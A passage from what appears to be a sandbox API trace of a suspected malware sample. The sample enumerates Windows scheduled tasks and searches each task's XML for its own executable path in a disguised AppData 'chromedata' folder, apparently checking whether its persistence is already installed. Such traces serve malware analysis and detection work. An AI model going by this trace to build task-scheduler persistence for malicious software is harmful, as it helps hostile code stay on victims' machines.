<Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"AllUsers\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0100.473] IUnknown:Release (This=0x63ff68) returned 0x0
	[0100.473] IRegisteredTaskCollection:get_Item (in: This=0x63fe80, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff68) returned 0x0
	[0100.473] IRegisteredTask:get_Name (in: This=0x63ff68, pName=0x128e3c | out: pName=0x128e3c*="IpAddressConflict2") returned 0x0
	[0100.473] IRegisteredTask:get_Xml (in: This=0x63ff68, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Tcpip\\IpAddressConflict2</URI>\r\n    <Date>2006-02-23T15:00:57</Date>\r\n    <Author>$(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10000)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10002)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"ef402a22-96ec-4526-a70a-85d0c36c85f6\">\r\n      <StartBoundary>2006-02-23T16:27:43</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Tcpip'] and EventID=4199]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"AllUsers\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0100.476] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Tcpip\\IpAddressConflict2</URI>\r\n    <Date>2006-02-23T15:00:57</Date>\r\n    <Author>$(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10000)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\drivers\\tcpip.sys,-10002)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"ef402a22-96ec-4526-a70a-85d0c36c85f6\">\r\n      <StartBoundary>2006-02-23T16:27:43</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Tcpip'] and EventID=4199]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"AllUsers\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0100.514] IUnknown:Release (This=0x63ff68) returned 0x0
	[0100.515] IUnknown:Release (This=0x63fe80) returned 0x0
	[0100.515] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fe80) returned 0x0
	[0100.516] ITaskFolderCollection:get_Count (in: This=0x63fe80, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0100.516] IUnknown:Release (This=0x63fe80) returned 0x0
	[0100.516] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0100.516] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x24, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0100.516] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fea0) returned 0x0
	[0100.518] IRegisteredTaskCollection:get_Count (in: This=0x63fea0, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0100.518] IRegisteredTaskCollection:get_Item (in: This=0x63fea0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x1691048) returned 0x0
	[0100.518] IRegisteredTask:get_Name (in: This=0x1691048, pName=0x128e3c | out: pName=0x128e3c*="MsCtfMonitor") returned 0x0
	[0100.518] IRegisteredTask:get_Xml (in: This=0x1691048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n    <Source>$(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1000)</Source>\r\n    <URI>Microsoft\\Windows\\TextServicesFramework\\MsCtfMonitor</URI>\r\n    <Description>$(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1001)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"AnyUser\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"AnyUser\">\r\n    <ComHandler>\r\n      <ClassId>{01575cfe-9a55-4003-a5e1-f38d1ebdcbe1}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0100.520] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n    <Source>$(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1000)</Source>\r\n    <URI>Microsoft\\Windows\\TextServicesFramework\\MsCtfMonitor</URI>\r\n    <Description>$(@%systemRoot%\\system32\\MsCtfMonitor.dll,-1001)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>true</Enabled>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"AnyUser\">\r\n      <GroupId>S-1-5-32-545</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"AnyUser\">\r\n    <ComHandler>\r\n      <ClassId>{01575cfe-9a55-4003-a5e1-f38d1ebdcbe1}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0100.545] IUnknown:Release (This=0x1691048) returned 0x0
	[0100.545] IUnknown:Release (This=0x63fea0) returned 0x0
	[0100.545] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fea0) returned 0x0
	[0100.546] ITaskFolderCollection:get_Count (in: This=0x63fea0, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0100.546] IUnknown:Release (This=0x63fea0) returned 0x0
	[0100.546] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0100.546] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x25, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0100.546] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fe98) returned 0x0
	[0100.547] IRegisteredTaskCollection:get_Count (in: This=0x63fe98, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0100.547] IRegisteredTaskCollection:get_Item (in: This=0x63fe98, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff90) returned 0x0
	[0100.548] IRegisteredTask:get_Name (in: This=0x63ff90, pName=0x128e3c | out: pName=0x128e3c*="SynchronizeTime") returned 0x0
	[0100.548] IRegisteredTask:get_Xml (in: This=0x63ff90, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\w32time.dll,-200)</Source>\r\n    <Author>$(@%systemroot%\\system32\\w32time.dll,-202)</Author>\r\n    <Description>$(@%systemroot%\\system32\\w32time.dll,-201)</Description>\r\n    <URI>Microsoft\\Windows\\Time Synchronization\\SynchronizeTime</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger id=\"TimeSyncWeeklyTrigger\">\r\n      <StartBoundary>2005-01-01T01:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Sunday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>1</WeeksInterval>\r\n      </ScheduleByWeek>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <WakeToRun>false</WakeToRun>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <Hidden>false</Hidden>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\sc.exe</Command>\r\n      <Arguments>start w32time task_started</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0100.550] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\w32time.dll,-200)</Source>\r\n    <Author>$(@%systemroot%\\system32\\w32time.dll,-202)</Author>\r\n    <Description>$(@%systemroot%\\system32\\w32time.dll,-201)</Description>\r\n    <URI>Microsoft\\Windows\\Time Synchronization\\SynchronizeTime</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger id=\"TimeSyncWeeklyTrigger\">\r\n      <StartBoundary>2005-01-01T01:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Sunday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>1</WeeksInterval>\r\n      </ScheduleByWeek>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <WakeToRun>false</WakeToRun>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <Hidden>false</Hidden>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\sc.exe</Command>\r\n      <Arguments>start w32time task_started</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0100.636] IUnknown:Release (This=0x63ff90) returned 0x0
	[0100.636] IUnknown:Release (This=0x63fe98) returned 0x0
	[0100.636] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fe98) returned 0x0
	[0100.637] ITaskFolderCollection:get_Count (in: This=0x63fe98, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0100.637] IUnknown:Release (This=0x63fe98) returned 0x0
	[0100.637] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0100.637] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x26, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0100.637] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fe78) returned 0x0
	[0100.639] IRegisteredTaskCollection:get_Count (in: This=0x63fe78, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0100.639] IRegisteredTaskCollection:get_Item (in: This=0x63fe78, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff50) returned 0x0
	[0100.639] IRegisteredTask:get_Name (in: This=0x63ff50, pName=0x128e3c | out: pName=0x128e3c*="UPnPHostConfig") returned 0x0
	[0100.639] IRegisteredTask:get_Xml (in: This=0x63ff50, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemroot%\\system32\\upnphost.dll,-215)</Author>\r\n    <Description>$(@%systemroot%\\system32\\upnphost.dll,-216)</Description>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)</SecurityDescriptor>\r\n    <URI>Microsoft\\Windows\\UPnP\\UPnPHostConfig</URI>\r\n  </RegistrationInfo>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>sc.exe</Command>\r\n      <Arguments>config upnphost start= auto</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0100.641] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemroot%\\system32\\upnphost.dll,-215)</Author>\r\n    <Description>$(@%systemroot%\\system32\\upnphost.dll,-216)</Description>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;LS)</SecurityDescriptor>\r\n    <URI>Microsoft\\Windows\\UPnP\\UPnPHostConfig</URI>\r\n  </RegistrationInfo>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>sc.exe</Command>\r\n      <Arguments>config upnphost start= auto</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0100.655] IUnknown:Release (This=0x63ff50) returned 0x0
	[0100.655] IUnknown:Release (This=0x63fe78) returned 0x0
	[0100.655] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fe78) returned 0x0
	[0100.656] ITaskFolderCollection:get_Count (in: This=0x63fe78, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0100.656] IUnknown:Release (This=0x63fe78) returned 0x0
	[0100.656] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0100.656] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x27, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0100.656] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fe98) returned 0x0
	[0100.658] IRegisteredTaskCollection:get_Count (in: This=0x63fe98, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0100.658] IRegisteredTaskCollection:get_Item (in: This=0x63fe98, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff90) returned 0x0
	[0100.658] IRegisteredTask:get_Name (in: This=0x63ff90, pName=0x128e3c | out: pName=0x128e3c*="HiveUploadTask") returned 0x0
	[0100.658] IRegisteredTask:get_Xml (in: This=0x63ff90, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\User Profile Service\\HiveUploadTask</URI>\r\n    <Version>1.0</Version>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\profsvc,-500)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\profsvc,-500)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\profsvc,-501)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <TimeTrigger>\r\n      <StartBoundary>2007-08-28T00:00:00</StartBoundary>\r\n      <RandomDelay>PT1H</RandomDelay>\r\n      <Repetition>\r\n        <Interval>PT12H</Interval>\r\n      </Repetition>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT2H</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <RestartOnFailure>\r\n      <Interval>PT2M</Interval>\r\n      <Count>3</Count>\r\n    </RestartOnFailure>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <ComHandler>\r\n      <ClassId>{BA677074-762C-444b-94C8-8C83F93F6605}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0100.660] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\User Profile Service\\HiveUploadTask</URI>\r\n    <Version>1.0</Version>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\profsvc,-500)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\profsvc,-500)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\profsvc,-501)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <TimeTrigger>\r\n      <StartBoundary>2007-08-28T00:00:00</StartBoundary>\r\n      <RandomDelay>PT1H</RandomDelay>\r\n      <Repetition>\r\n        <Interval>PT12H</Interval>\r\n      </Repetition>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT2H</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <RestartOnFailure>\r\n      <Interval>PT2M</Interval>\r\n      <Count>3</Count>\r\n    </RestartOnFailure>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"LocalSystem\">\r\n    <ComHandler>\r\n      <ClassId>{BA677074-762C-444b-94C8-8C83F93F6605}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0100.688] IUnknown:Release (This=0x63ff90) returned 0x0
	[0100.688] IUnknown:Release (This=0x63fe98) returned 0x0
	[0100.688] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fe98) returned 0x0
	[0100.689] ITaskFolderCollection:get_Count (in: This=0x63fe98, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0100.689] IUnknown:Release (This=0x63fe98) returned 0x0
	[0100.689] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0100.689] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x28, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
